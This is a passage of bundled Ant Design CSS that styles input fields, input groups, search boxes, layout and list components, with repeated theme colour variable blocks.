--ant-primary-color-deprecated-pure: ; --ant-primary-color-deprecated-l-35: #cbe6ff; --ant-primary-color-deprecated-l-20: #7ec1ff; --ant-primary-color-deprecated-t-20: #46a6ff; --ant-primary-color-deprecated-t-50: #8cc8ff; --ant-primary-color-deprecated-f-12: rgba(24, 144, 255, 0.12); --ant-primary-color-active-deprecated-f-30: rgba(230, 247, 255, 0.3); --ant-primary-color-active-deprecated-d-02: #dcf4ff; --ant-success-color: #52c41a; --ant-success-color-hover: #73d13d; --ant-success-color-active: #389e0d; --ant-success-color-outline: rgba(82, 196, 26, 0.2); --ant-success-color-deprecated-bg: #f6ffed; --ant-success-color-deprecated-border: #b7eb8f; --ant-error-color: #ff4d4f; --ant-error-color-hover: #ff7875; --ant-error-color-active: #d9363e; --ant-error-color-outline: rgba(255, 77, 79, 0.2); --ant-error-color-deprecated-bg: #fff2f0; --ant-error-color-deprecated-border: #ffccc7; --ant-warning-color: #faad14; --ant-warning-color-hover: #ffc53d; --ant-warning-color-active: #d48806; --ant-warning-color-outline: rgba(250, 173, 20, 0.2); --ant-warning-color-deprecated-bg: #fffbe6; --ant-warning-color-deprecated-border: #ffe58f; --ant-info-color: #1890ff; --ant-info-color-deprecated-bg: #e6f7ff; --ant-info-color-deprecated-border: #91d5ff; } .ant-input-affix-wrapper { position: relative; display: inline-block; width: 100%; min-width: 0; padding: 4px 11px; color: rgba(0, 0, 0, 0.85); font-size: 14px; line-height: 1.5715; background-color: #fff; background-image: none; border: 1px solid #d9d9d9; border-radius: 2px; transition: all 0.3s; /* stylelint-disable-next-line selector-no-vendor-prefix */ display: inline-flex; } .ant-input-affix-wrapper::-moz-placeholder { opacity: 1; } .ant-input-affix-wrapper:-ms-input-placeholder { color: #bfbfbf; -ms-user-select: none; user-select: none; } .ant-input-affix-wrapper::placeholder { color: #bfbfbf; -webkit-user-select: none; -moz-user-select: none; -ms-user-select: none; user-select: none; } .ant-input-affix-wrapper:-moz-placeholder-shown { text-overflow: ellipsis; } .ant-input-affix-wrapper:-ms-input-placeholder { text-overflow: ellipsis; } .ant-input-affix-wrapper:placeholder-shown { text-overflow: ellipsis; } .ant-input-affix-wrapper:hover { border-color: var(--ant-primary-5); border-right-width: 1px !important; } .ant-input-rtl .ant-input-affix-wrapper:hover { border-right-width: 0; border-left-width: 1px !important; } .ant-input-affix-wrapper:focus, .ant-input-affix-wrapper-focused { border-color: var(--ant-primary-color-hover); box-shadow: 0 0 0 2px var(--ant-primary-color-outline); border-right-width: 1px !important; outline: 0; } .ant-input-rtl .ant-input-affix-wrapper:focus, .ant-input-rtl .ant-input-affix-wrapper-focused { border-right-width: 0; border-left-width: 1px !important; } .ant-input-affix-wrapper-disabled { color: rgba(0, 0, 0, 0.25); background-color: #f5f5f5; border-color: #d9d9d9; box-shadow: none; cursor: not-allowed; opacity: 1; } .ant-input-affix-wrapper-disabled:hover { border-color: #d9d9d9; border-right-width: 1px !important; } .ant-input-affix-wrapper[disabled] { color: rgba(0, 0, 0, 0.25); background-color: #f5f5f5; border-color: #d9d9d9; box-shadow: none; cursor: not-allowed; opacity: 1; } .ant-input-affix-wrapper[disabled]:hover { border-color: #d9d9d9; border-right-width: 1px !important; } .ant-input-affix-wrapper-borderless, .ant-input-affix-wrapper-borderless:hover, .ant-input-affix-wrapper-borderless:focus, .ant-input-affix-wrapper-borderless-focused, .ant-input-affix-wrapper-borderless-disabled, .ant-input-affix-wrapper-borderless[disabled] { background-color: transparent; border: none; box-shadow: none; } textarea.ant-input-affix-wrapper { max-width: 100%; height: auto; min-height: 32px; line-height: 1.5715; vertical-align: bottom; transition: all 0.3s, height 0s; } .ant-input-affix-wrapper-lg { padding: 6.5px 11px; font-size: 16px; } .ant-input-affix-wrapper-sm { padding: 0px 7px; } .ant-input-affix-wrapper-rtl { direction: rtl; } .ant-input-affix-wrapper:not(.ant-input-affix-wrapper-disabled):hover { border-color: var(--ant-primary-5); border-right-width: 1px !important; z-index: 1; } .ant-input-rtl .ant-input-affix-wrapper:not(.ant-input-affix-wrapper-disabled):hover { border-right-width: 0; border-left-width: 1px !important; } .ant-input-search-with-button .ant-input-affix-wrapper:not(.ant-input-affix-wrapper-disabled):hover { z-index: 0; } .ant-input-affix-wrapper-focused, .ant-input-affix-wrapper:focus { z-index: 1; } .ant-input-affix-wrapper-disabled .ant-input[disabled] { background: transparent; } .ant-input-affix-wrapper > input.ant-input { padding: 0; border: none; outline: none; } .ant-input-affix-wrapper > input.ant-input:focus { box-shadow: none !important; } .ant-input-affix-wrapper::before { width: 0; visibility: hidden; content: '\a0'; } .ant-input-prefix, .ant-input-suffix { display: flex; flex: none; align-items: center; } .ant-input-show-count-suffix { color: rgba(0, 0, 0, 0.45); } .ant-input-show-count-has-suffix { margin-right: 2px; } .ant-input-prefix { margin-right: 4px; } .ant-input-suffix { margin-left: 4px; } .anticon.ant-input-clear-icon { margin: 0; color: rgba(0, 0, 0, 0.25); font-size: 12px; vertical-align: -1px; cursor: pointer; transition: color 0.3s; } .anticon.ant-input-clear-icon:hover { color: rgba(0, 0, 0, 0.45); } .anticon.ant-input-clear-icon:active { color: rgba(0, 0, 0, 0.85); } .anticon.ant-input-clear-icon-hidden { visibility: hidden; } .anticon.ant-input-clear-icon-has-suffix { margin: 0 4px; } .ant-input-affix-wrapper-textarea-with-clear-btn { padding: 0 !important; border: 0 !important; } .ant-input-affix-wrapper-textarea-with-clear-btn .ant-input-clear-icon { position: absolute; top: 8px; right: 8px; z-index: 1; } .ant-input { box-sizing: border-box; margin: 0; padding: 0; font-variant: tabular-nums; list-style: none; font-feature-settings: 'tnum'; position: relative; display: inline-block; width: 100%; min-width: 0; padding: 4px 11px; color: rgba(0, 0, 0, 0.85); font-size: 14px; line-height: 1.5715; background-color: #fff; background-image: none; border: 1px solid #d9d9d9; border-radius: 2px; transition: all 0.3s; /* stylelint-disable-next-line selector-no-vendor-prefix */ } .ant-input::-moz-placeholder { opacity: 1; } .ant-input:-ms-input-placeholder { color: #bfbfbf; -ms-user-select: none; user-select: none; } .ant-input::placeholder { color: #bfbfbf; -webkit-user-select: none; -moz-user-select: none; -ms-user-select: none; user-select: none; } .ant-input:-moz-placeholder-shown { text-overflow: ellipsis; } .ant-input:-ms-input-placeholder { text-overflow: ellipsis; } .ant-input:placeholder-shown { text-overflow: ellipsis; } .ant-input:hover { border-color: var(--ant-primary-5); border-right-width: 1px !important; } .ant-input-rtl .ant-input:hover { border-right-width: 0; border-left-width: 1px !important; } .ant-input:focus, .ant-input-focused { border-color: var(--ant-primary-color-hover); box-shadow: 0 0 0 2px var(--ant-primary-color-outline); border-right-width: 1px !important; outline: 0; } .ant-input-rtl .ant-input:focus, .ant-input-rtl .ant-input-focused { border-right-width: 0; border-left-width: 1px !important; } .ant-input-disabled { color: rgba(0, 0, 0, 0.25); background-color: #f5f5f5; border-color: #d9d9d9; box-shadow: none; cursor: not-allowed; opacity: 1; } .ant-input-disabled:hover { border-color: #d9d9d9; border-right-width: 1px !important; } .ant-input[disabled] { color: rgba(0, 0, 0, 0.25); background-color: #f5f5f5; border-color: #d9d9d9; box-shadow: none; cursor: not-allowed; opacity: 1; } .ant-input[disabled]:hover { border-color: #d9d9d9; border-right-width: 1px !important; } .ant-input-borderless, .ant-input-borderless:hover, .ant-input-borderless:focus, .ant-input-borderless-focused, .ant-input-borderless-disabled, .ant-input-borderless[disabled] { background-color: transparent; border: none; box-shadow: none; } textarea.ant-input { max-width: 100%; height: auto; min-height: 32px; line-height: 1.5715; vertical-align: bottom; transition: all 0.3s, height 0s; } .ant-input-lg { padding: 6.5px 11px; font-size: 16px; } .ant-input-sm { padding: 0px 7px; } .ant-input-rtl { direction: rtl; } .ant-input-group { box-sizing: border-box; margin: 0; padding: 0; color: rgba(0, 0, 0, 0.85); font-size: 14px; font-variant: tabular-nums; line-height: 1.5715; list-style: none; font-feature-settings: 'tnum'; position: relative; display: table; width: 100%; border-collapse: separate; border-spacing: 0; } .ant-input-group[class*='col-'] { float: none; padding-right: 0; padding-left: 0; } .ant-input-group > [class*='col-'] { padding-right: 8px; } .ant-input-group > [class*='col-']:last-child { padding-right: 0; } .ant-input-group-addon, .ant-input-group-wrap, .ant-input-group > .ant-input { display: table-cell; } .ant-input-group-addon:not(:first-child):not(:last-child), .ant-input-group-wrap:not(:first-child):not(:last-child), .ant-input-group > .ant-input:not(:first-child):not(:last-child) { border-radius: 0; } .ant-input-group-addon, .ant-input-group-wrap { width: 1px; white-space: nowrap; vertical-align: middle; } .ant-input-group-wrap > * { display: block !important; } .ant-input-group .ant-input { float: left; width: 100%; margin-bottom: 0; text-align: inherit; } .ant-input-group .ant-input:focus { z-index: 1; border-right-width: 1px; } .ant-input-group .ant-input:hover { z-index: 1; border-right-width: 1px; } .ant-input-search-with-button .ant-input-group .ant-input:hover { z-index: 0; } .ant-input-group-addon { position: relative; padding: 0 11px; color: rgba(0, 0, 0, 0.85); font-weight: normal; font-size: 14px; text-align: center; background-color: #fafafa; border: 1px solid #d9d9d9; border-radius: 2px; transition: all 0.3s; } .ant-input-group-addon .ant-select { margin: -5px -11px; } .ant-input-group-addon .ant-select.ant-select-single:not(.ant-select-customize-input) .ant-select-selector { background-color: inherit; border: 1px solid transparent; box-shadow: none; } .ant-input-group-addon .ant-select-open .ant-select-selector, .ant-input-group-addon .ant-select-focused .ant-select-selector { color: var(--ant-primary-color); } .ant-input-group-addon .ant-cascader-picker { margin: -9px -12px; background-color: transparent; } .ant-input-group-addon .ant-cascader-picker .ant-cascader-input { text-align: left; border: 0; box-shadow: none; } .ant-input-group > .ant-input:first-child, .ant-input-group-addon:first-child { border-top-right-radius: 0; border-bottom-right-radius: 0; } .ant-input-group > .ant-input:first-child .ant-select .ant-select-selector, .ant-input-group-addon:first-child .ant-select .ant-select-selector { border-top-right-radius: 0; border-bottom-right-radius: 0; } .ant-input-group > .ant-input-affix-wrapper:not(:first-child) .ant-input { border-top-left-radius: 0; border-bottom-left-radius: 0; } .ant-input-group > .ant-input-affix-wrapper:not(:last-child) .ant-input { border-top-right-radius: 0; border-bottom-right-radius: 0; } .ant-input-group-addon:first-child { border-right: 0; } .ant-input-group-addon:last-child { border-left: 0; } .ant-input-group > .ant-input:last-child, .ant-input-group-addon:last-child { border-top-left-radius: 0; border-bottom-left-radius: 0; } .ant-input-group > .ant-input:last-child .ant-select .ant-select-selector, .ant-input-group-addon:last-child .ant-select .ant-select-selector { border-top-left-radius: 0; border-bottom-left-radius: 0; } .ant-input-group-lg .ant-input, .ant-input-group-lg > .ant-input-group-addon { padding: 6.5px 11px; font-size: 16px; } .ant-input-group-sm .ant-input, .ant-input-group-sm > .ant-input-group-addon { padding: 0px 7px; } .ant-input-group-lg .ant-select-single .ant-select-selector { height: 40px; } .ant-input-group-sm .ant-select-single .ant-select-selector { height: 24px; } .ant-input-group .ant-input-affix-wrapper:not(:last-child) { border-top-right-radius: 0; border-bottom-right-radius: 0; } .ant-input-search .ant-input-group .ant-input-affix-wrapper:not(:last-child) { border-top-left-radius: 2px; border-bottom-left-radius: 2px; } .ant-input-group .ant-input-affix-wrapper:not(:first-child), .ant-input-search .ant-input-group .ant-input-affix-wrapper:not(:first-child) { border-top-left-radius: 0; border-bottom-left-radius: 0; } .ant-input-group.ant-input-group-compact { display: block; } .ant-input-group.ant-input-group-compact::before { display: table; content: ''; } .ant-input-group.ant-input-group-compact::after { display: table; clear: both; content: ''; } .ant-input-group.ant-input-group-compact-addon:not(:first-child):not(:last-child), .ant-input-group.ant-input-group-compact-wrap:not(:first-child):not(:last-child), .ant-input-group.ant-input-group-compact > .ant-input:not(:first-child):not(:last-child) { border-right-width: 1px; } .ant-input-group.ant-input-group-compact-addon:not(:first-child):not(:last-child):hover, .ant-input-group.ant-input-group-compact-wrap:not(:first-child):not(:last-child):hover, .ant-input-group.ant-input-group-compact > .ant-input:not(:first-child):not(:last-child):hover { z-index: 1; } .ant-input-group.ant-input-group-compact-addon:not(:first-child):not(:last-child):focus, .ant-input-group.ant-input-group-compact-wrap:not(:first-child):not(:last-child):focus, .ant-input-group.ant-input-group-compact > .ant-input:not(:first-child):not(:last-child):focus { z-index: 1; } .ant-input-group.ant-input-group-compact > * { display: inline-block; float: none; vertical-align: top; border-radius: 0; } .ant-input-group.ant-input-group-compact > .ant-input-affix-wrapper { display: inline-flex; } .ant-input-group.ant-input-group-compact > .ant-picker-range { display: inline-flex; } .ant-input-group.ant-input-group-compact > *:not(:last-child) { margin-right: -1px; border-right-width: 1px; } .ant-input-group.ant-input-group-compact .ant-input { float: none; } .ant-input-group.ant-input-group-compact > .ant-select > .ant-select-selector, .ant-input-group.ant-input-group-compact > .ant-select-auto-complete .ant-input, .ant-input-group.ant-input-group-compact > .ant-cascader-picker .ant-input, .ant-input-group.ant-input-group-compact > .ant-input-group-wrapper .ant-input { border-right-width: 1px; border-radius: 0; } .ant-input-group.ant-input-group-compact > .ant-select > .ant-select-selector:hover, .ant-input-group.ant-input-group-compact > .ant-select-auto-complete .ant-input:hover, .ant-input-group.ant-input-group-compact > .ant-cascader-picker .ant-input:hover, .ant-input-group.ant-input-group-compact > .ant-input-group-wrapper .ant-input:hover { z-index: 1; } .ant-input-group.ant-input-group-compact > .ant-select > .ant-select-selector:focus, .ant-input-group.ant-input-group-compact > .ant-select-auto-complete .ant-input:focus, .ant-input-group.ant-input-group-compact > .ant-cascader-picker .ant-input:focus, .ant-input-group.ant-input-group-compact > .ant-input-group-wrapper .ant-input:focus { z-index: 1; } .ant-input-group.ant-input-group-compact > .ant-select-focused { z-index: 1; } .ant-input-group.ant-input-group-compact > .ant-select > .ant-select-arrow { z-index: 1; } .ant-input-group.ant-input-group-compact > *:first-child, .ant-input-group.ant-input-group-compact > .ant-select:first-child > .ant-select-selector, .ant-input-group.ant-input-group-compact > .ant-select-auto-complete:first-child .ant-input, .ant-input-group.ant-input-group-compact > .ant-cascader-picker:first-child .ant-input { border-top-left-radius: 2px; border-bottom-left-radius: 2px; } .ant-input-group.ant-input-group-compact > *:last-child, .ant-input-group.ant-input-group-compact > .ant-select:last-child > .ant-select-selector, .ant-input-group.ant-input-group-compact > .ant-cascader-picker:last-child .ant-input, .ant-input-group.ant-input-group-compact > .ant-cascader-picker-focused:last-child .ant-input { border-right-width: 1px; border-top-right-radius: 2px; border-bottom-right-radius: 2px; } .ant-input-group.ant-input-group-compact > .ant-select-auto-complete .ant-input { vertical-align: top; } .ant-input-group.ant-input-group-compact .ant-input-group-wrapper + .ant-input-group-wrapper { margin-left: -1px; } .ant-input-group.ant-input-group-compact .ant-input-group-wrapper + .ant-input-group-wrapper .ant-input-affix-wrapper { border-radius: 0; } .ant-input-group.ant-input-group-compact .ant-input-group-wrapper:not(:last-child).ant-input-search > .ant-input-group > .ant-input-group-addon > .ant-input-search-button { border-radius: 0; } .ant-input-group.ant-input-group-compact .ant-input-group-wrapper:not(:last-child).ant-input-search > .ant-input-group > .ant-input { border-radius: 2px 0 0 2px; } .ant-input-group > .ant-input-rtl:first-child, .ant-input-group-rtl .ant-input-group-addon:first-child { border-radius: 0 2px 2px 0; } .ant-input-group-rtl .ant-input-group-addon:first-child { border-right: 1px solid #d9d9d9; border-left: 0; } .ant-input-group-rtl .ant-input-group-addon:last-child { border-right: 0; border-left: 1px solid #d9d9d9; } .ant-input-group-rtl.ant-input-group > .ant-input:last-child, .ant-input-group-rtl.ant-input-group-addon:last-child { border-radius: 2px 0 0 2px; } .ant-input-group-rtl.ant-input-group .ant-input-affix-wrapper:not(:first-child) { border-radius: 2px 0 0 2px; } .ant-input-group-rtl.ant-input-group .ant-input-affix-wrapper:not(:last-child) { border-radius: 0 2px 2px 0; } .ant-input-group-rtl.ant-input-group.ant-input-group-compact > *:not(:last-child) { margin-right: 0; margin-left: -1px; border-left-width: 1px; } .ant-input-group-rtl.ant-input-group.ant-input-group-compact > *:first-child, .ant-input-group-rtl.ant-input-group.ant-input-group-compact > .ant-select:first-child > .ant-select-selector, .ant-input-group-rtl.ant-input-group.ant-input-group-compact > .ant-select-auto-complete:first-child .ant-input, .ant-input-group-rtl.ant-input-group.ant-input-group-compact > .ant-cascader-picker:first-child .ant-input { border-radius: 0 2px 2px 0; } .ant-input-group-rtl.ant-input-group.ant-input-group-compact > *:last-child, .ant-input-group-rtl.ant-input-group.ant-input-group-compact > .ant-select:last-child > .ant-select-selector, .ant-input-group-rtl.ant-input-group.ant-input-group-compact > .ant-select-auto-complete:last-child .ant-input, .ant-input-group-rtl.ant-input-group.ant-input-group-compact > .ant-cascader-picker:last-child .ant-input, .ant-input-group-rtl.ant-input-group.ant-input-group-compact > .ant-cascader-picker-focused:last-child .ant-input { border-left-width: 1px; border-radius: 2px 0 0 2px; } .ant-input-group.ant-input-group-compact .ant-input-group-wrapper-rtl + .ant-input-group-wrapper-rtl { margin-right: -1px; margin-left: 0; } .ant-input-group.ant-input-group-compact .ant-input-group-wrapper-rtl:not(:last-child).ant-input-search > .ant-input-group > .ant-input { border-radius: 0 2px 2px 0; } .ant-input-group-wrapper { display: inline-block; width: 100%; text-align: start; vertical-align: top; } .ant-input-password-icon { color: rgba(0, 0, 0, 0.45); cursor: pointer; transition: all 0.3s; } .ant-input-password-icon:hover { color: rgba(0, 0, 0, 0.85); } .ant-input[type='color'] { height: 32px; } .ant-input[type='color'].ant-input-lg { height: 40px; } .ant-input[type='color'].ant-input-sm { height: 24px; padding-top: 3px; padding-bottom: 3px; } .ant-input-textarea-show-count > .ant-input { height: 100%; } .ant-input-textarea-show-count::after { float: right; color: rgba(0, 0, 0, 0.45); white-space: nowrap; content: attr(data-count); pointer-events: none; } .ant-input-search .ant-input:hover, .ant-input-search .ant-input:focus { border-color: var(--ant-primary-5); } .ant-input-search .ant-input:hover + .ant-input-group-addon .ant-input-search-button:not(.ant-btn-primary), .ant-input-search .ant-input:focus + .ant-input-group-addon .ant-input-search-button:not(.ant-btn-primary) { border-left-color: var(--ant-primary-5); } .ant-input-search .ant-input-affix-wrapper { border-radius: 0; } .ant-input-search .ant-input-lg { line-height: 1.5713; } .ant-input-search > .ant-input-group > .ant-input-group-addon:last-child { left: -1px; padding: 0; border: 0; } .ant-input-search > .ant-input-group > .ant-input-group-addon:last-child .ant-input-search-button { padding-top: 0; padding-bottom: 0; border-radius: 0 2px 2px 0; } .ant-input-search > .ant-input-group > .ant-input-group-addon:last-child .ant-input-search-button:not(.ant-btn-primary) { color: rgba(0, 0, 0, 0.45); } .ant-input-search > .ant-input-group > .ant-input-group-addon:last-child .ant-input-search-button:not(.ant-btn-primary).ant-btn-loading::before { top: 0; right: 0; bottom: 0; left: 0; } .ant-input-search-button { height: 32px; } .ant-input-search-button:hover, .ant-input-search-button:focus { z-index: 1; } .ant-input-search-large .ant-input-search-button { height: 40px; } .ant-input-search-small .ant-input-search-button { height: 24px; } .ant-input-group-wrapper-rtl { direction: rtl; } .ant-input-group-rtl { direction: rtl; } .ant-input-affix-wrapper.ant-input-affix-wrapper-rtl > input.ant-input { border: none; outline: none; } .ant-input-affix-wrapper-rtl .ant-input-prefix { margin: 0 0 0 4px; } .ant-input-affix-wrapper-rtl .ant-input-suffix { margin: 0 4px 0 0; } .ant-input-textarea-rtl { direction: rtl; } .ant-input-textarea-rtl.ant-input-textarea-show-count::after { text-align: left; } .ant-input-affix-wrapper-rtl .ant-input-clear-icon-has-suffix { margin-right: 0; margin-left: 4px; } .ant-input-affix-wrapper-rtl .ant-input-clear-icon { right: auto; left: 8px; } .ant-input-search-rtl { direction: rtl; } .ant-input-search-rtl .ant-input:hover + .ant-input-group-addon .ant-input-search-button:not(.ant-btn-primary), .ant-input-search-rtl .ant-input:focus + .ant-input-group-addon .ant-input-search-button:not(.ant-btn-primary) { border-right-color: var(--ant-primary-5); border-left-color: #d9d9d9; } .ant-input-search-rtl > .ant-input-group > .ant-input-affix-wrapper:hover, .ant-input-search-rtl > .ant-input-group > .ant-input-affix-wrapper-focused { border-right-color: var(--ant-primary-5); } .ant-input-search-rtl > .ant-input-group > .ant-input-group-addon { right: -1px; left: auto; } .ant-input-search-rtl > .ant-input-group > .ant-input-group-addon .ant-input-search-button { border-radius: 2px 0 0 2px; } @media screen and (-ms-high-contrast: active), (-ms-high-contrast: none) { .ant-input { height: 32px; } .ant-input-lg { height: 40px; } .ant-input-sm { height: 24px; } .ant-input-affix-wrapper > input.ant-input { height: auto; } } /* stylelint-disable at-rule-empty-line-before,at-rule-name-space-after,at-rule-no-unknown */ /* stylelint-disable no-duplicate-selectors */ /* stylelint-disable */ /* stylelint-disable declaration-bang-space-before,no-duplicate-selectors,string-no-newline */ html { --ant-primary-color: #1890ff; --ant-primary-color-hover: #40a9ff; --ant-primary-color-active: #096dd9; --ant-primary-color-outline: rgba(24, 144, 255, 0.2); --ant-primary-1: #e6f7ff; --ant-primary-2: #bae7ff; --ant-primary-3: #91d5ff; --ant-primary-4: #69c0ff; --ant-primary-5: #40a9ff; --ant-primary-6: #1890ff; --ant-primary-7: #096dd9; --ant-primary-color-deprecated-pure: ; --ant-primary-color-deprecated-l-35: #cbe6ff; --ant-primary-color-deprecated-l-20: #7ec1ff; --ant-primary-color-deprecated-t-20: #46a6ff; --ant-primary-color-deprecated-t-50: #8cc8ff; --ant-primary-color-deprecated-f-12: rgba(24, 144, 255, 0.12); --ant-primary-color-active-deprecated-f-30: rgba(230, 247, 255, 0.3); --ant-primary-color-active-deprecated-d-02: #dcf4ff; --ant-success-color: #52c41a; --ant-success-color-hover: #73d13d; --ant-success-color-active: #389e0d; --ant-success-color-outline: rgba(82, 196, 26, 0.2); --ant-success-color-deprecated-bg: #f6ffed; --ant-success-color-deprecated-border: #b7eb8f; --ant-error-color: #ff4d4f; --ant-error-color-hover: #ff7875; --ant-error-color-active: #d9363e; --ant-error-color-outline: rgba(255, 77, 79, 0.2); --ant-error-color-deprecated-bg: #fff2f0; --ant-error-color-deprecated-border: #ffccc7; --ant-warning-color: #faad14; --ant-warning-color-hover: #ffc53d; --ant-warning-color-active: #d48806; --ant-warning-color-outline: rgba(250, 173, 20, 0.2); --ant-warning-color-deprecated-bg: #fffbe6; --ant-warning-color-deprecated-border: #ffe58f; --ant-info-color: #1890ff; --ant-info-color-deprecated-bg: #e6f7ff; --ant-info-color-deprecated-border: #91d5ff; } .ant-layout { display: flex; flex: auto; flex-direction: column; /* fix firefox can't set height smaller than content on flex item */ min-height: 0; background: #f0f2f5; } .ant-layout, .ant-layout * { box-sizing: border-box; } .ant-layout.ant-layout-has-sider { flex-direction: row; } .ant-layout.ant-layout-has-sider > .ant-layout, .ant-layout.ant-layout-has-sider > .ant-layout-content { width: 0; } .ant-layout-header, .ant-layout-footer { flex: 0 0 auto; } .ant-layout-header { height: 64px; padding: 0 50px; color: rgba(0, 0, 0, 0.85); line-height: 64px; background: #001529; } .ant-layout-footer { padding: 24px 50px; color: rgba(0, 0, 0, 0.85); font-size: 14px; background: #f0f2f5; } .ant-layout-content { flex: auto; /* fix firefox can't set height smaller than content on flex item */ min-height: 0; } .ant-layout-sider { position: relative; /* fix firefox can't set width smaller than content on flex item */ min-width: 0; background: #001529; transition: all 0.2s; } .ant-layout-sider-children { height: 100%; margin-top: -0.1px; padding-top: 0.1px; } .ant-layout-sider-children .ant-menu.ant-menu-inline-collapsed { width: auto; } .ant-layout-sider-has-trigger { padding-bottom: 48px; } .ant-layout-sider-right { order: 1; } .ant-layout-sider-trigger { position: fixed; bottom: 0; z-index: 1; height: 48px; color: #fff; line-height: 48px; text-align: center; background: #002140; cursor: pointer; transition: all 0.2s; } .ant-layout-sider-zero-width > * { overflow: hidden; } .ant-layout-sider-zero-width-trigger { position: absolute; top: 64px; right: -36px; z-index: 1; width: 36px; height: 42px; color: #fff; font-size: 18px; line-height: 42px; text-align: center; background: #001529; border-radius: 0 2px 2px 0; cursor: pointer; transition: background 0.3s ease; } .ant-layout-sider-zero-width-trigger::after { position: absolute; top: 0; right: 0; bottom: 0; left: 0; background: transparent; transition: all 0.3s; content: ''; } .ant-layout-sider-zero-width-trigger:hover::after { background: rgba(255, 255, 255, 0.1); } .ant-layout-sider-zero-width-trigger-right { left: -36px; border-radius: 2px 0 0 2px; } .ant-layout-sider-light { background: #fff; } .ant-layout-sider-light .ant-layout-sider-trigger { color: rgba(0, 0, 0, 0.85); background: #fff; } .ant-layout-sider-light .ant-layout-sider-zero-width-trigger { color: rgba(0, 0, 0, 0.85); background: #fff; } .ant-layout-rtl { direction: rtl; } /* stylelint-disable at-rule-empty-line-before,at-rule-name-space-after,at-rule-no-unknown */ /* stylelint-disable no-duplicate-selectors */ /* stylelint-disable */ /* stylelint-disable declaration-bang-space-before,no-duplicate-selectors,string-no-newline */ html { --ant-primary-color: #1890ff; --ant-primary-color-hover: #40a9ff; --ant-primary-color-active: #096dd9; --ant-primary-color-outline: rgba(24, 144, 255, 0.2); --ant-primary-1: #e6f7ff; --ant-primary-2: #bae7ff; --ant-primary-3: #91d5ff; --ant-primary-4: #69c0ff; --ant-primary-5: #40a9ff; --ant-primary-6: #1890ff; --ant-primary-7: #096dd9; --ant-primary-color-deprecated-pure: ; --ant-primary-color-deprecated-l-35: #cbe6ff; --ant-primary-color-deprecated-l-20: #7ec1ff; --ant-primary-color-deprecated-t-20: #46a6ff; --ant-primary-color-deprecated-t-50: #8cc8ff; --ant-primary-color-deprecated-f-12: rgba(24, 144, 255, 0.12); --ant-primary-color-active-deprecated-f-30: rgba(230, 247, 255, 0.3); --ant-primary-color-active-deprecated-d-02: #dcf4ff; --ant-success-color: #52c41a; --ant-success-color-hover: #73d13d; --ant-success-color-active: #389e0d; --ant-success-color-outline: rgba(82, 196, 26, 0.2); --ant-success-color-deprecated-bg: #f6ffed; --ant-success-color-deprecated-border: #b7eb8f; --ant-error-color: #ff4d4f; --ant-error-color-hover: #ff7875; --ant-error-color-active: #d9363e; --ant-error-color-outline: rgba(255, 77, 79, 0.2); --ant-error-color-deprecated-bg: #fff2f0; --ant-error-color-deprecated-border: #ffccc7; --ant-warning-color: #faad14; --ant-warning-color-hover: #ffc53d; --ant-warning-color-active: #d48806; --ant-warning-color-outline: rgba(250, 173, 20, 0.2); --ant-warning-color-deprecated-bg: #fffbe6; --ant-warning-color-deprecated-border: #ffe58f; --ant-info-color: #1890ff; --ant-info-color-deprecated-bg: #e6f7ff; --ant-info-color-deprecated-border: #91d5ff; } .ant-list { box-sizing: border-box; margin: 0; padding: 0; color: rgba(0, 0, 0, 0.85); font-size: 14px; font-variant: tabular-nums; line-height: 1.5715; list-style: none; font-feature-settings: 'tnum'; position: relative; } .ant-list * { outline: none; } .ant-list-pagination { margin-top: 24px; text-align: right; } .ant-list-pagination .ant-pagination-options { text-align: left; } .ant-list-more { margin-top: 12px; text-align: center; } .ant-list-more button { padding-right: 32px; padding-left: 32px; } .ant-list-spin { min-height: 40px; text-align: center; } .ant-list-empty-text { padding: 16px; color: rgba(0, 0, 0, 0.25); font-size: 14px; text-align: center; } .ant-list-items { margin: 0; padding: 0; list-style: none; } .ant-list-item { display: flex; align-items: center; justify-content: space-between; padding: 12px 0; color: rgba(0, 0, 0, 0.85); } .ant-list-item-meta { display: flex; flex: 1; align-items: flex-start; max-width: 100%; } .ant-list-item-meta-avatar { margin-right: 16px; } .ant-list-item-meta-content { flex: 1 0; width: 0; color: rgba(0, 0, 0, 0.85); } .ant-list-item-meta-title { margin-bottom: 4px; color: rgba(0, 0, 0, 0.85); font-size: 14px; line-height: 1.5715; } .ant-list-item-meta-title > a { color: rgba(0, 0, 0, 0.85); transition: all 0.3s; } .ant-list-item-meta-title > a:hover { color: var(--ant-primary-color); } .ant-list-item-meta-description { color: rgba(0, 0, 0, 0.45); font-size: 14px; line-height: 1.5715; } .ant-list-item-action { flex: 0 0 auto; margin-left: 48px; padding: 0; font-size: 0; list-style: none; } .ant-list-item-action > li { position: relative; display: inline-block; padding: 0 8px; color: rgba(0, 0, 0, 0.45); font-size: 14px; line-height: 1.5715; text-align: center; } .ant-list-item-action > li:first-child { padding-left: 0; } .ant-list-item-action-split { position: absolute; top: 50%; right: 0; width: 1px; height: 14px; margin-top: -7px; background-color: #f0f0f0; } .ant-list-header { background: transparent; } .ant-list-footer { background: transparent; } .ant-list-header, .ant-list-footer { padding-top: 12px; padding-bottom: 12px; } .ant-list-empty { padding: 16px 0; color: rgba(0, 0, 0, 0.45); font-size: 12px; text-align: center; } .ant-list-split .ant-list-item { border-bottom: 1px solid #f0f0f0; } .ant-list-split .ant-list-item:last-child { border-bottom: none; } .ant-list-split .ant-list-header { border-bottom: 1px solid #f0f0f0; } .ant-list-split.ant-list-empty .ant-list-footer { border-top: 1px solid #f0f0f0; } .ant-list-loading .ant-list-spin-nested-loading { min-height: 32px; } .ant-list-split.ant-list-something-after-last-item .ant-spin-container > .ant-list-items > .ant-list-item:last-child { border-bottom: 1px solid #f0f0f0; } .ant-list-lg .ant-list-item { padding: 16px 24px; } .ant-list-sm .ant-list-item { padding: 8px 16px; } .ant-list-vertical .ant-list-item { align-items: initial; } .ant-list-vertical .ant-list-item-main { display: block; flex: 1; } .ant-list-vertical .ant-list-item-extra { margin-left: 40px; } .ant-list-vertical .ant-list-item-meta { margin-bottom: 16px; } .ant-list-vertical .ant-list-item-meta-title { margin-bottom: 12px; color: rgba(0, 0, 0, 0.85); font-size: 16px; line-height: 24px; } .ant-list-vertical .ant-list-item-action { margin-top: 16px; margin-left: auto; } .ant-list-vertical .ant-list-item-action > li { padding: 0 16px; } .ant-list-vertical .ant-list-item-action > li:first-child { padding-left: 0; } .ant-list-grid .ant-col > .ant-list-item { display: block; max-width: 100%; margin-bottom: 16px; padding-top: 0; padding-bottom: 0; border-bottom: none; } .ant-list-item-no-flex { display: block; } 